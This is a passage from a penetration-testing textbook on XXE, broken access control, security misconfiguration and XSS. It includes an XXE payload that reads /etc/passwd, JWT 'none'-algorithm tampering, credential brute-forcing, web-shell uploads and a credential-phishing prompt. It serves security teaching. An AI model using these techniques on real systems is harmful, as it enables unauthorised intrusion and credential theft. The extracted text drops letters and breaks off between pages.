The exposure of sensitive data comes in many forms; as attackers it benets
us to be familiar with various web application vulnerabilities and useful tools
to help with exploitation.
Chapter 5
Details: As with other OWASP top ten vulnerabilities, XXE is an attack that
takes into account several elements, such as a webserver hosting a vulnerable
application, a poorly congured XML processor, an attacker, and the ability
to submit input which will be processed by the vulnerable XML processor.
Let's discuss these components and the intricacies of XXE in more detail.
XML (Extensible Markup Language) is a markup language (like HTML)
commonly used on the web to facilitate the storage and transportation of
data. XML is self-descriptive and comprised of user dened tags as opposed
to HTML, which has a limited number of predened tags developers can
utilize. Figure 5.1 shows an example of XML. Note the arbitrary names of
the tags and the equally arbitrary values dened within each tag; the rst
line in this example is called the prolog.
55
56 The Penetration Tester's Guide to Web Applications
Note this internal entity has been dened in the local DTD (hence standalone
being set to yes in the prolog) and is merely serving as a placeholder for the
author's name. This is useful when there is a need to repeatedly reference the
author without wanting to hardcode it. Also note the syntax of the entity as
shown in the author element: The beginning ampersand "&" followed by the
entity name and nally the semicolon. Below is an example of an external
OWASP A4:2017 XML External Entities (XXE) 57
entity reference. The example in Figure 5.3 introduces a few more components
of XML useful to discuss, and which will help us eventually craft an attack
we can understand and appreciate.
In this example the SYSTEM keyword denotes the entity is private (the
concept being this entity would be reserved for perhaps a single author of
the document) contrasted with the PUBLIC keyword. The reference to the
evilsite.info URI denotes the location where the entity can be found (and
would subsequently be incorporated into the document) and since this is
no longer local, "standalone is set to no in the prolog. For thoroughness,
PCDATA refers to Parsed Character Data, which will be parsed by the parser
opposed to CDATA (Character Data), which will not be parsed tags inside
CDATA will not be treated as markup and entities inside of CDATA will
not be expanded. With this knowledge, a possible attack would be to replace
the reference to the URI with that of a le from the vulnerable application's
local lesystem. This would in turn tell the parser to replace the reference
to the entity with the le and subsequently display its output as shown in
Figure 5.4.
58 The Penetration Tester's Guide to Web Applications
to its conguration. For instance, remote code execution is typically rare, and
depends on the type of XML processor being used and how it has been writ-
ten. More often, the information disclosure of listing directory contents and
reading les is the extent of the aw. We can typically use this aw to gain a
foothold when we are able to read les which contain sensitive information.
Examples of this would be SSH key les, les containing passwords, and even
web server source code les which, when resulting in source code disclosure,
can also lead us down a path of remote compromise. As this aw will re-
sult in the ability to list directory contents and read les, it behooves us as
penetration testers to have a comfortable/deep understanding of lesystem
structures and locations of interesting les. XXE, as with other application
layer vulnerabilities, impacts the application oftentimes regardless of the un-
derlying operating system, thus in the case of XXE the OS may be running
Windows, Linux, or BSD. Knowing the structure of the lesystem associated
with the OS will help us craft more potent and fruitful attacks.
Processing XML is not an overly complex task and can in fact be accom-
plished with only a few lines of code when leveraging suitable libraries to
assist in the process. For instance, the XMLHttpRequest object has an XML
parser built in and can be leveraged in our browser to handle this. Conversely,
in many situations processing and parsing XML documents can be a cum-
bersome task best suited for dedicated programs purpose-built for the job. It
is this latter fact which lends itself to error-prone consequences meaning that
oftentimes a commercially available (or open-source) processor is vulnerable,
and the business/application relying on this software is at risk of compro-
mise. Commonly a business is accustomed to purchasing software to provide
a solution (like HR and payroll benets) and is not responsible for updating
or maintaining the code. Likewise, the consumer of a commercial product is
generally ill-equipped to perform any type of security testing/scanning of the
commercial software they purchase. Due to this, it is not uncommon for at-
tackers to be the rst to discover an XXE aw in externally available systems
supporting end user XML input.
attack string to exploit the aw. So, at this point the identication of the
aw was conrmed and I even had the code required to exploit. My next
step was to take the attack code (which was basically just an HTTP POST
request) and utilize Burp to rst conrm that I could reproduce the nding
(Nessus did show the results of the /etc/passwd le so I had a high level of
condence the nding was legitimate) using my own tools since reproducing
the aw ensures there is not a false positive, and of equal importance, this
enables me to tweak the POST request to meet my needs. Burp's repeater
tool is a great choice to use when there is a need to modify HTTP requests,
submit them, review the results of the request, and continue to modify until
the request is perfect. Using Repeater, I was not only able to reproduce the
original request and conrm the aw but also specify other les and folders
to view. The successful exploit can be seen in Figure 5.5.
OWASP A4:2017 XML External Entities (XXE) 61
At this point I was able to view local directory listings on the OS hosting the
vulnerable application, local from the perspective of the OS, but remote from
my perspective, and was able to read les which I had permission to read.
I had access to navigate the entire lesystem and wrote a custom script to
aid in automatically parsing le contents. This was implemented in bash and
leveraged wget to make the POST request followed by parsing the contents
62 The Penetration Tester's Guide to Web Applications
of the results le. The challenging part of the script was writing the logic to
determine whether the results were contents of a le or a directory listing as it
was not always evident from the results of the POST request without manual
review. After running the script, I reviewed the resulting les which had
been downloaded and grepped though them for keywords such as password
and key. Within several user directories were improperly congured ssh keys
which I was able to read. From there, gaining SSH access to the vulnerable
systems was trivial. The XXE vulnerability resulted in the compromise of
several hosts and served as the initial vulnerability that led to the eventual
compromise of the entire environment.
identication phase we can leverage the fuzzing feature of ZAP and will exe-
cute our attack on the prole/quote input on the vulnerable HR management
system depicted in Figure 5.6.
The form's text box allows us to submit input to the application which will
in turn be handled by an XML processor. The resulting text, if valid, will
be used to update our "user quote". After enabling ZAP and conguring our
browser to leverage the proxy, we rst prime ZAP with the applicable POST
request. The next step is to fuzz the input with each of the attack strings
mentioned a moment ago and then launch the attack in order to try and
invoke an error. In reality, if we are only submitting a dozen or so strings then
64 The Penetration Tester's Guide to Web Applications
Focusing on the response size (the size, in bytes, of the HTTP response
from the server) we can see there is an evident dierence for several of the
submitted inputs per Figure 5.8.
66 The Penetration Tester's Guide to Web Applications
ZAP is doing what we told it to do: launching the fuzzing attack. This tool
however is not going to have the context in this instance to understand the
attack we launched or the impact/relevance of the strings submitted and
subsequent results from the application. The point is, it is incumbent upon
us as the attacker to understand what we are doing and wield our tools
accordingly. Even using the built-in scanning feature of ZAP failed to identify
the XXE vulnerability on this page, as seen in Figure 5.9.
OWASP A4:2017 XML External Entities (XXE) 67
Figure 5.9 ZAP alerts showing some ndings but not XXE.
Specically as it pertains to the output of Figure 5.10, we can see on the far
right of the bottom portion of ZAP's output the parameters submitted using
the fuzzer, starting with < and proceeded by > , . <! and so on from top to
bottom. The highlighted input shows a response size of 3,664 bytes, which is
not only dierent from all of the other response sizes but also the largest.
68 The Penetration Tester's Guide to Web Applications
Examples: Continuing with the HTML form example, let's work to invoke
additional error messages. ZAP's Open/Resend with Request Editor tool (as
well as Burp's repeater which is essentially the same thing) will work great
for this. Since we know the POST payload and request to focus on, we can
begin by modifying the payload to include an attack string specic to the
application and input. Submitting the string:
userquote=<!DOCTYPE test [ <!ELEMENT test ANY ><!ENTITY xxe
SYSTEM "le:///etc/passwd" >]><quote>&xxe;</quote>
Yields the output of multiple errors including these below and also shown
in Figure 5.11:
Fatal Error 68: StartTag: invalid element name Line: 4 Column: 2
Fatal Error 68: StartTag: invalid element name Line: 4 Column: 19
Fatal Error 68: StartTag: invalid element name Line: 4 Column: 39
Fatal Error 76: Opening and ending tag mismatch: quote line 4 and q Line:
5 Column: 6
Fatal Error 76: Opening and ending tag mismatch: q line 3 and uq Line: 6
Column: 6
Fatal Error 77: Premature end of data in tag uq line 2 Line: 6 Column: 6
70 The Penetration Tester's Guide to Web Applications
In viewing this error output, we are presented with clues on how to modify
our input to resolve the errors and hopefully end up with valid XML syntax
that includes our payload (in this example the /etc/passwd reference). Let's
modify the attack input to try and resolve the errors. Based on the rst error
it looks like the standard XML prolog may be expected in this example, so
adding in <?xml version='1.0'> might help our eorts. There also seems to
be an in correctly typed quote as both single and double quotes are being
OWASP A4:2017 XML External Entities (XXE) 71
used. The tag mismatch errors may be corrected with the modications al-
ready made. Resubmitting the request with ZAP now yields the expected
/etc/passwd output as seen in the respective request and response Figures
5.12 and 5.13.
Figure 5.16:
77
78 The Penetration Tester's Guide to Web Applications
The login process looks simple enough, the problem is that the authorization
(as well as authentication in this case) occurred as soon as the username
was submitted. Specically, by inputting a valid username I was able to gain
access to that user's account while completely bypassing the rest of the login
process. I have come across issues like this on various web applications, the
root cause of which stems from a broken access control system; a failure to
80 The Penetration Tester's Guide to Web Applications
validate the request properly before granting access. To elaborate on how this
was possible, keep in mind that this was a white-box test so I had access to
several valid accounts. I proceeded to start the login process using one of the
test accounts and took notes of what page I was redirected to (home.aspx)
once I successfully authenticated to the application. With this information
I logged out, and submitted a dierent username on the rst login page
and then simply force browsed to home.aspx which ended up showing me as
logged in and authorized to access all of the account features for this user.
The hard part was categorizing this vulnerability as it's clearly an example
of broken authentication just as it's indicative of broken access control. We'll
explore this and techniques for exploitation in more detail next.
Examples: Search engines do a good job of scanning the web, nding pub-
licly available websites and data, and making this information available for
us to easily search. When a website is miscongured and subsequently leak-
ing sensitive information, divulging error messages (useful for SQL injection
for example) or other information we can use to attack it, Google, Bing,
Shodan, and other search engines often encounter this, save it, and make
this information available to search as well. This situation is not limited to
websites and error messages, but to any internet-connected device and any
useful information including version numbers. Think about it from this per-
84 The Penetration Tester's Guide to Web Applications
spective: if we can use a search engine to quickly nd which websites are
running version x.x of software z (like OpenSSL version 1.0.1f) and there
is a known exploit for this version of the software, then we can leverage
the search results to compile a list of hosts to attack. In some situations
the search results themselves will leak the sensitive information attackers
are seeking, and these are the concepts behind Google Dorks. As Google is
the best at what it does in the search realm, it is the de facto tool used
to identify some classes of vulnerabilities including those leading to broken
access control. Successfully using Google to obtain this type of information
relies on us knowing the various search operators and how to wield them cor-
rectly. The basic syntax to obtain search results showing only results from
our target website is: site:example.com where example.com is replaced with
the actual target web application (note there is no space between the colon
and the target). This is useful for reconnaissance as it will output all of the
dierent hosts (like www.example.com, ftp.example.com, login.example.com,
api.example.com, dev.example.com, etc.) Google is aware of and allowed to
show for the target domain, which we can further lter with the - sign to
exclude certain, perhaps already known hosts. See Figure 6.5 and Figure 6.6
for examples.
OWASP A5:2017 Broken Access Control 85
Let's add to this by introducing more operators to further narrow down ex-
actly what we are looking for, such as directory browsing and interesting
documents. Documents like PDFs, DOCXs, images, and the like can have
embedded metadata which we can parse through to gain access to potential
usernames, details on the version and software used to create the documents,
and other interesting information we can use to our advantage. This is accom-
plished by simply adding the ext operator with an accompanying extension
like site:example.com -www.example.com ext:pdf. This will show results from
all hosts on the example.com domain except for the www.example.com web-
OWASP A5:2017 Broken Access Control 87
site and should only display PDF documents. We can subsequently click on
each link and download each PDF (or automate this process) and then use
exiftool to search for interesting metadata as shown in Figure 6.7.
Figure 6.7 Metadata output as seen from command line using exiftool.
even though it exists (in this hypothetical example). However, we can simply
open our browser and manually browse to that page and this is the concept
behind forced browsing, only with a bit more intelligence by using precon-
structed lists of popular/common page names and directory listing results
which may not otherwise be indexed by search engines. ZAP has a built-in
feature called Forced Browse which does just this; it used to be a standalone
tool called DirBuster but has since been incorporated into the core function-
ality of ZAP (Figure 6.8).
By selecting the target application we want to force browse, we can start the
tool and view the results which will show us available directories (or les as
the case may be); basically responses from the website which do not contain
a 404 response code. We do however, in most cases, want to tune the tool to
use a custom list or at least modify the default word list to include les and
folders we are already aware of from our reconnaissance, directory browsing
results, and previous engagements to be the most eective. Figure 6.9 shows
the results of a Forced Browse attack.
OWASP A5:2017 Broken Access Control 89
The results of the forced browsing attack will often yield directories and pages
which should not be exposed externally, or are missing the appropriate access
controls respectively. As with the results from other tools, it is incumbent
upon us to manually verify the results and use them to further our goals of
gaining access to the target system.
Poorly congured web applications may expose elements responsible for
access control to the client in GET parameters, hidden form elds, cookies,
and other areas typically used to handle session state. In the case of pa-
rameters, these can be aptly named admin, role, userlevel or similarly with
an associated numerical value denoting the type of access/privilege. In cases
when such a parameter exists, we want to attempt to modify the value to see
if by changing the value we can modify our level of access. Figure 6.10 shows
an example of various parameters and values.
information to guide our eorts but with the proper tools and mindset we
can succeed in identifying and exploiting elements associated with broken
access control and other aws for that matter.
Another common example of broken access control is centered around the
JSON Web Token (JWT) which is a stateless mechanism described in RFC
7519 used for authentication. A JWT can be thought of as a digitally-signed
container carrying identication information such as a username, level of per-
mission, associated claims, expiration time and so on. The JWT is comprised
of three parts: A header, payload, and signature, collectively constructed as a
variable length Base64 encoded string of characters separated by two periods.
This is shown in Figure 6.11.
The string of characters preceding the rst period (the header) denote the
algorithm used to encrypt the payload (in some cases) and the token type
such as HS256 (HMAC with SHA256) and JWT respectively. The next string
of characters, between the two periods, is the payload. The nal string of
characters is the signature which is calculated using a secret key to encrypt
the values of the header and payload (once again in some cases, as JWT don't
have to be encrypted and can be instead digitally singed). Like many things
in cyber security, when implemented correctly a JWT does a good job for its
intended purpose, it's when the implementation is awed that we nd ways
to exploit it.
As it pertains to the security of JWT, two of the main things we want
to test are the strength of the secret key used for signing and weaknesses
in libraries blindly accepting none as the hashing algorithm. The example
application shown in Figure 6.12 uses JWT for authentication as we can
see from the HTTP response header sent to our browser after the initial
successful login request, depicted in Figure 6.13.
OWASP A5:2017 Broken Access Control 91
With this information we can see the user authenticated as a guest with what
seems to be a privilege level of ve. At times there is sensitive information
in JWT that is important for us to identify as it may be useful for further
attacks. This token is signed which means while we can easily see what the
header and payloads contain, and even change these contents, if we do so
and resubmit the token, the server or API should reject our request based
on a signature mismatch stemming from our tampering. However, we can
attempt to simply change the algorithm from HS256 to none, remove the
signature, change guest to administrator and resubmit the token. This could
be accomplished with ZAP's encode/decode feature; see Figure 6.15 through
6.18 for details.
97
98 The Penetration Tester's Guide to Web Applications
servers and database servers replicating to multiple datacenters, and this was
the status quo for over a decade; it's how we arrived at a point where we could
not only patch vulnerabilities, update certicates and manage/inspect trac
ow, but also upgrade our codebase in real-time without impact. This idea
of automating the maintenance and succession of dozens of moving parts all
of which are driven by software and version control, gave way to a devops ap-
proach of continuous integration, continuous delivery, and constant change to
the environment. While adoption of true devops is still not extremely preva-
lent in most larger companies, the underlying concepts of devops have taken
hold in many organizations, and as a result weekly sprints, regular change
advisory board (CAB) meetings and adoption of cloud services/platforms are
very common. This newer method of automating implementation, delivery,
testing, and so on sets heightened expectations on the quality of security,
and can also result in a complex system requiring constant attention to en-
sure stability, uidity, and adherence to business requirements. As a result
of the constant state of ux, establishing baseline hardening principals and
continuing to implement them becomes dicult to do if the process is not
constantly updated or elegantly automated.
Because of this and other competing priorities, it is often found that de-
fault settings are left unchanged, debugging is enabled on production systems,
unnecessary services are found to be running, and secure build documents are
not maintained on paper or followed in practice. Change management ticket
requests to allow rewall rules for a new server build in the DMZ are approved
because the business needs outweigh the security concerns and "scanning af-
ter the go-live will nd all the issues". Security professionals often see the
missteps of typical business operations, the corners cut and the aftermath
of doing so over an extended period of time, as the results are evident the
rst time we conduct a penetration test. If you are not privy to these real-
ities know that they happen every day due to an example scenario like the
one just mentioned or due to incompetence/ignorance or just poor business
practices. Malice is almost never a factor; humans want to do the right thing
most of the time, and in a for-prot business environment, keeping systems
online and ensuring continued revenue is the right thing to do.
Real-World Dialog: I teach several classes for the SANS institute and in
some of the discussions with students the topic of server hardening comes
up. We look at netcraft results and the adoption of security headers and
SSL/TLS congurations on varying websites and invariably the value of the
Server header (as seen in Figure 7.1) is brought up.
OWASP A6:2017 Security Misconguration 99
Why divulge the real value for this header? Why tell everyone we are running
Apache with various modules compiled and their associated versions? Is there
any value in doing so, and is there any increase in security if we hide or alter
these values? These questions will almost always result in a spirited conversa-
tion about security through obscurity (just because we hide the value doesn't
mean any vulnerabilities associated with our version of software disappear...),
software popularity metrics (how else can we measure how prevalent Apache
is compared to others...), with me steering the conversation to if we believe
the value is accurate (or how we might verify its accuracy). In practice the
most I have seen done to the Server header value is hiding it or completely
removing it and I see this about 3% of the time. The other 97% of the time
the header is divulged, accurately portraying the underlying software being
used to serve the website. Why? Because 3% of the time a WAF hides this
header by default and the other 97% of the time absolutely no one with the
ability and level of access required to make this change has ever had so little
work to do that the task of "changing the default Server header" has risen to
the top of their priority list. Of course, I have not conrmed this but some-
thing tells me I am right. . . . Another thing that doesn't always get changed
are default passwords for commercial software.
During the internal portion of a network penetration test a colleague came
across an IBM WebSphere server, and in doing his due diligence (researching
and identifying potential default administrative passwords) was able to login
with administrative rights simply using the vendor documented default login
credentials. This was a production system hosting a multitude of websites
while running atop a Windows 2016 enterprise server. With administrative
rights we were able to deploy arbitrary war les, among other things, re-
sulting in a running instance of our custom code. With this functionality I
wrote a simple JSP page with an input box allowing for command execu-
tion/injection. Whatever command we submitted to the form was executed
on the Windows server with *system* privilege. An encoded MSF PowerSehll
100 The Penetration Tester's Guide to Web Applications
payload spawning an Empire agent ensued, as did our initial foothold into
the network.
A common fallacy I had before I gained experience at various companies
was that larger organizations were more secure than smaller ones. My thought
process was based on the notion that a large company has lots of money, and
therefore has more security sta and the latest or best technology across the
enterprise. If the company didn't have the best technology and the smartest
people maintaining the infrastructure, then surely, they would not remain
on the cutting edge for long, and their role as a protable leader in their
industry would diminish over time. That was my logic and needless to say it
was signicantly awed. What I learned is embodied in the bulk of this "Real
World Dialog" section of this chapter. Complexity breeds insecurity and the
more technology, the more stu a company has, the harder it is to keep track
of everything. With that let's turn our attention to how to exploit security
miscongurations.
With this information the next step is to search for known default creden-
tials and known vulnerabilities; useful resources to aid in this step are CIRT
(cirt.net/passwords) and the CVE list (cve.mitre.org) respectively. A quick
search through CIRT for Splunk passwords shows only one set of credentials
as seen in Figure 7.4.
102 The Penetration Tester's Guide to Web Applications
A search on the CVE list shows our version of Splunk as being vulnerable to
CVE-2018-11409, and contains a link to the exploit database where author
"KoF2002" has contributed a PoC (proof of concept) attack string as we can
see in Figure 7.5.
At this point we logically want to try and login with the default credentials
and attempt to exploit the information disclosure vulnerability.
Websites don't just run on port 80 and port 443, and though the target
of our testing may be the primary web interface, we need to be cognizant
of additional services listening on the target host. The most ecient way to
identify additional running services is by using nmap. This tool can quickly
OWASP A6:2017 Security Misconguration 103
determine which ports are open, and can probe to determine which service is
running. Beyond basic port scanning however, nmap comes with a series of
built-in scripts as part of the NSE (nmap scripting engine) which we can use
to identify vulnerabilities in some cases, and further expose information about
the target system. Basic invocation of the tool will help identify listening
services by scanning, as a default setting, the most popular/common 1000
ports on a target system. Figure 7.6 shows the results of such a scan.
The ports identied as open have the associated service description displayed
as part of the output, but to ensure nmap is actually probing to determine
the true listening service and its version, we want to specify the -sV option
as part of our command. Doing so may change a previously unknown result
to a description of the actual service running on the given port as well as
the identied version. It's also prudent to enable OS detection as a matter of
course in most situations, and run some basic NSE scripts as well as a trace
route for thoroughness. Nmap provides the "-A" option to do all of this in
one command; that is, what would normally be a command consisting of,
"nmap -sV -O traceroute script=default" can now be executed as "nmap -
A" with the intended target(s) indicated as part of the command. The results
are visible in Figure 7.7.
104 The Penetration Tester's Guide to Web Applications
with a typical nmap scan. From a UNIX-based system the command, "ls
/usr/share/nmap/scripts/*http* | wc -l" yields a result of over 130 HTTP
scripts (a snippet of which is shown in Figure 7.8) ranging from a joomla-
brute force utility to a form fuzzer, and over one dozen CVE vulnerability
checks (akin to a vulnerability scanner).
and Burp and None for example), some useful extensions might include a
utility to identify the IP address of the current domain we are browsing to,
tamper data, user-agent switcher, web developer, and the like. In addition,
we can glean a signicant amount of information about a target web appli-
cation and the technology it uses by using the wappalyzer extension which
is shown in Figure 7.9.
Figure 7.9 Wappalyzer output as seen when viewing from within browser.
Similar to mobile app permissions, we have the ability to see what information
an extension will require to operate prior to installing it, and we want to be
careful because the extension is executing in our browser. As we submit
sensitive content, the extension has the ability to access this information.
Unless we are vetting each extension manually or writing our own, we have
to rely on the community and our level of trust with the developer/team
responsible for writing the extension. Of course, the same could be said of
our browser and OS for that matter. It can be interesting to see how ckle
any conglomerate of software actually is the deeper we understand the inner
workings and trust relationships. With our current level of potential security
misconguration understanding, let's shift our focus to exploitation.
With the output of this stack trace we can hone in on the software version
information and parlay this knowledge to conduct a search for CVEs. This
is usually the quickest way to exploitation, and while there are many tens of
thousands of vulnerabilities being identied every year, nding a matching
vulnerability specic to our target software with an accompanying and work-
ing exploit is rare. What we come across more often is a reference to a CVE
for a version of software with little to no detailed information about the aw
and no exploit code. As we saw in the Splunk example earlier, some exploits
are rather basic and consist of nothing more than a specially crafted GET
OWASP A6:2017 Security Misconguration 109
request. However, many other public exploits require very specic conditions
to work, and can be time-consuming to debug when they fail. With that be-
ing said, exploit development is certainly a skill which will serve us well as we
can't always rely on a known exploit being available and reliable. Turning our
attention back to cstat identied in the stack trace, we can try to do some
research about the technology, but a quick web search returns something
similar (however nothing exactly referencing this software). Turning to nmap
with a command of "nmap -p 1-65535 -A -oA cstatServer 10.90.14.27" will
scan all ports with the benets of the "-A" previously mentioned while out-
putting results to three dierent formats (XML, greppable, and the default)
with a base output lename of "statServer". This is useful as greppable out-
put is easy to search whereas the default nmap output is much more detailed.
Finally, the XML output is very verbose and actually contains signicantly
more information than even the default nmap format output. An example of
default nmap output is shown in Figure 7.11.
The results of the nmap scan show a high port listening with an identied
service called cstat and corresponding version of "0.22". Browsing to this
port (as shown in Figure 7.12) shows the administrative interface for what
appears to be the CMS (content management system) for the web application
running on the default ports of 80 and 443 on the same server.
110 The Penetration Tester's Guide to Web Applications
Submitting the username identied in the stack trace results in a 401 HTTP
response and prompts for a Basic Authentication dialog box in our browser.
Another security misconguration, Basic Authentication has no concept of
account lockout.... The exposed username is valid and was congured with a
weak password which we were able to guess with just under 10,000 requests.
A bash oneliner helped to concatenate the "jsmith" username with a list of
common passwords as we can see in Figure 7.14 whereas Figure 7.15 shows
the utilization of the encoded payload.
OWASP A6:2017 Security Misconguration 111
ZAP's fuzzer was easily setup to use this list of precongured base64 encoded
credentials and we can see looking at the results that one request resulted in
a 200 response code (our indicator of success which is visible in Figure 7.16).
Figure 7.17 shows the result of gaining administrative access upon sucessful
expolitation.
112 The Penetration Tester's Guide to Web Applications
With administrative access to the CMS we have the ability to create new
pages, moderate content, change permissions, impersonate (as well as create
and delete) users, and so on. A straightforward method of gaining shell access
in this case is to upload a shell (via the convenient content management
feature of the CMS) and then access it from our browser. A collection of
ASP web shells exist online, and the minimal code shown in Figure 7.18 will
provide a HTML form where we can submit commands (Figure 8.19) to the
back-end OS. The results of a successful attack are shown in Figure 7.20.
OWASP A6:2017 Security Misconguration 113
https://nameofbucket.storage.googleapis.com/nameofobjectinbucket
https://storage.googleapis.com/nameofbucket/nameofobjectinbucket
https://s3.amazon.com/nameofbucket/nameofobjectinbucket
https://nameofbucket.s3.amazon.com/nameofobjectinbucket
https://nameofbucket.blob.core.windows.net/nameofobjectinbucket
In addition there may be a full path required to specify the location of the
name of the object in the bucket. The content in the storage container is very
much meant to be accessible by someone or some process hence the familiar
OWASP A6:2017 Security Misconguration 115
URL format to access a bucket all we need to know is the name of the
bucket. To identify the bucket name we want to hone in on, we can turn back
to our search engine of choice and conduct a search with the site: directive to
narrow down the results. For example, a query of, "site:blob.core.windows.net
'nameoftarget'" should help and of course additional operators to search for
specic document types and keywords will further lter the results to exactly
what we are looking for as is evident in Figure 7.21.
Finding evidence of cloud storage containers and having condence that the
identied container and the contents in the container are public (we can
set granular permissions on not just the folder/directory/bucket but also
the les/resources within the bucket) takes a bit more eort. While manual
eorts are convenient for quickly checking for the existence of the storage
containers in a one-o situation, we want to automate this process as our
target list grows. While we could create our own solution to handle the pro-
cess of identifying cloud storage containers for the three major cloud service
providers, the tools to do this already exist. Years ago, a fellow security pro-
fessional released a Ruby script "bucket_nder.rb" to automate this process
for S3 buckets; it requires a wordlist (applicable names of buckets to search
for) and supports the ability to download the publicly available les along
with logging. This is shown in Figure 7.22.
116 The Penetration Tester's Guide to Web Applications
containers, additional examples of which we'll explore later. There are many
ways to incorrectly congure a web server, cloud service, codebase, and as
penetration testers we need to be well versed in knowing what to look for,
knowing how to identify a given aw, and how we can use the vulnerability
to gain further access to the system. This chapter claried that the target
scope of the penetration test can vary signicantly based on the expectations,
business, and rules of engagement. Typically, the root cause of security mis-
congurations stem from human oversight or poor planning/implementation.
Staying up to date with the latest technology is challenging, and it's not un-
common for distinct teams in an organization to move quickly in adopting a
new solution to a current problem. The diculty securing a given solution
stems from limitations in our knowledge, the infancy of the chosen technol-
ogy, the lack of documentation, employee turnover and the accumulation of
technical debt. All of these things, with the addition of time, make it very
hard to secure an environment and subsequently provides opportunities for
us to succeed in our endeavors.
Chapter 8
119
120 The Penetration Tester's Guide to Web Applications
rare that the client/business will allow us to target users of their production
application.
The root cause of an XSS vulnerability resides at the web application
layer, typically the code-base; unsanitized user input is not adequately en-
coded prior to being sent to a user or being executed in the DOM. This means
we can submit a malicious payload (almost always JavaScript; other script-
ing languages will also work) to the application, and in turn this payload
is parsed/stored or otherwise accepted by the application and subsequently
returned to the victim. If this happens immediately (as an HTTP response to
our HTTP request), this would be an example of reected XSS. If the payload
is executed later, when we navigate to a specic portion of the application,
this would be stored XSS. In the event the XSS attack never gets sent to the
server (by utilizing the # character in the URL for example) or otherwise
is delivered and resides strictly in the DOM, this would be an example of
DOM-based XSS.
A stored XSS vulnerability allows us to use the persistent storage of the
application (typically the back-end database) to host our malicious payload
while the web server conveniently serves our attack to users of the application.
This type of aw can be devastating as everyone visiting the compromised
web application will be served our malicious JavaScript from the origin of
the vulnerable host. To be clear, we can submit malicious scripts which will
subsequently be sent from the server to the client, and execute in the client's
browser. The same origin policy (SOP) is not being bypassed as the source
of the script (from the perspective of the browser) is the vulnerable host.
This means our malicious script will run in the victim's browser and be
able to access the DOM and other resources just as a legitimate/benign
script could. The potency of this type of attack is signicant as JavaScript
is a powerful programming language, and thus, when we launch a successful
attack, we have a lot of control over what occurs in the context of the client's
experience, session, and interactions with the vulnerable web application and
their browser. We have to think about browser plugins, browser password
storage, social engineering attacks, and more as JavaScript executing in a
browser has access to the entirety of the technology exposed by the API; yet
another reason why attacking clients is not typically in-scope.
Reected XSS is not persistent and is typically delivered via a link to the
victim, which will in turn be submitted to the vulnerable application as a
GET request. This means the attack is a one-time event (or as many times as
the link is clicked). In this situation we would nd a vulnerable GET param-
eter, craft an attack and share the entire URI, complete with the malicious
OWASP A7:2017 Cross-Site Scripting (XSS) 121
JavaScript, to the victim and hope the bait is taken. The ensuing attack
would only execute when the victim clicks the link and submits the GET
request, and the malicious script is sent back to the victim's browser with
the HTTP response. However, we would have to target individual victims
and have them directly interact with our attack string, so this is not always
a viable path to exploitation. A DOM-based XSS vulnerability can be stored
or reected.
Sometimes it can be hard to clearly explain XSS to a typical business
leader; in addition, it can be challenging to convey the risk of XSS. To aid
in these eorts, we need to nd a path to exploitation which adequately
portrays the risk of the nding. To do this we have to conduct research
into the extent of the vulnerability, and test the payload on ourself rst, to
tweak it to perfection. As with previously discussed vulnerabilities, there are
limitations to XSS attacks in terms of the impact they will have and our
ability to successfully launch the attack. Recall there are three components
to XSS (the application, our attack/payload, and the victim), each of which
has the potential to reduce our eectiveness; for instance, if our payload is
poorly tested, or the attack vector is minimal or the client simply has script
execution disabled in her browser. Even with these limitations we can still
oftentimes launch a serious attack with real consequences to the victim. And
let's be clear the user is the victim of the attack, not the application (at
least not directly). It is the victim which has the browser which executes our
code the application is merely the conduit for our payload initially.
XSS is the second most common nding in the OWASP top ten list, but
it's not the second most impactful due to the limitations already touched on.
A common attack scenario for XSS is to hijack a user's session by obtaining
the session token and sending it to the attacker. Another common attack
with XSS is to alter the contents of the page, modify form actions, enable
keystroke logging, or otherwise attempt to gain access to sensitive informa-
tion. Yet another very important XSS attack is to obtain XSRF tokens to
bypass security controls. As with any other vulnerability identied during a
penetration test, the risk rating associated with XSS must always be taken
in context: How sensitive is the application and what is the level of impact
associated with our successful exploitation?
Being such a common vulnerability, there are a multitude of tools designed
specically to identify XSS. However, the complexity of JavaScript (especially
minied and purposefully obfuscated, as seen in Figure 8.1) makes the task
of reading it, let alone comprehending it, challenging for some vulnerability
scanning tools and can lead to false negatives.
122 The Penetration Tester's Guide to Web Applications
There are however multiple tools that can reliably nd many XSS vulner-
abilities, such as our interception proxies and commercial web application
vulnerability scanning tools when congured properly. We'll discuss several
of these tools and applicable attack scenarios later in this chapter.
point of contact denied the request to use the obtained credentials, so I fo-
cused my attention on other modules such as a custom dialog box. I used
BeEF to produce a prompt asking the user to resubmit his credentials to the
application "Your session is about to expire..." and was able to obtain his
username and password, even better than his cookie!
With this information I was able to simply login to the application as
this user which provided me with an elevated level of privilege. Additional
functionality was enabled with this access, and a subsequently identied in-
jection vulnerability eventually provided shell access to the system. From
XSS to SQLi to shell; not an entirely uncommon approach as sole XSS rarely
can be parlayed into injection or other direct server-side exploitation.
of the report, most XSS injection tools will provide a PDF, HTML, or text-
based output le consisting of the attack payload and the resulting response
from the server. The problem with the results of the test being delivered in
this way is that we can't conrm there is an XSS aw if the payload doesn't
execute in the browser (any browser). Two important takeaways from the
last sentence are the concept of the browser executing the code as well as
the mention of "any browser". First, many web application scanning tools
will report the existence of XSS aws, provide the applicable HTTP request
(with the payload), show the resulting HTTP response (also with the pay-
load), and conclude the application/parameter is vulnerable to XSS based on
this result. We then have to take this information and duplicate the nding
using our browser to ensure it's not a false positive; just because the pay-
load is present in both the request and response doesn't mean it will execute
in the browser. This leads to the next point; the browser is where the pay-
load executes... but what if the browser is actively blocking the execution of
the payload? Does this mean the application is not vulnerable? The answer
is no. Dierent browsers have dierent JavaScript engines, APIs, supported
features, and ways of parsing code, meaning a given payload may execute in
the Midori and Maxthon web browsers, but not Chrome and Edge. Further-
more, when an application is congured to set the enabled X-XSS security
header, compatible browsers will enable limited built-in protections against
some reected XSS attacks. In these cases, the underlying application is still
vulnerable; however, we need to show the impact, and when the impact con-
sists of a minute amount of actual users which could be impacted by the aw,
we have to take that into consideration when calculating the risk ranking of
the nding.
In eect, when we use tools to help identify XSS aws, we still need to
manually conrm the nding, and more importantly, weaponize a payload.
The string, "<script>alert("xss");</script>" is very often used to test for
XSS, and in turn makes its way to penetration testing reports as evidence,
an example of which is shown in Figure 8.2.
OWASP A7:2017 Cross-Site Scripting (XSS) 125
Hovering over the link shows a URL of (separated by multiple lines for read-
ability):
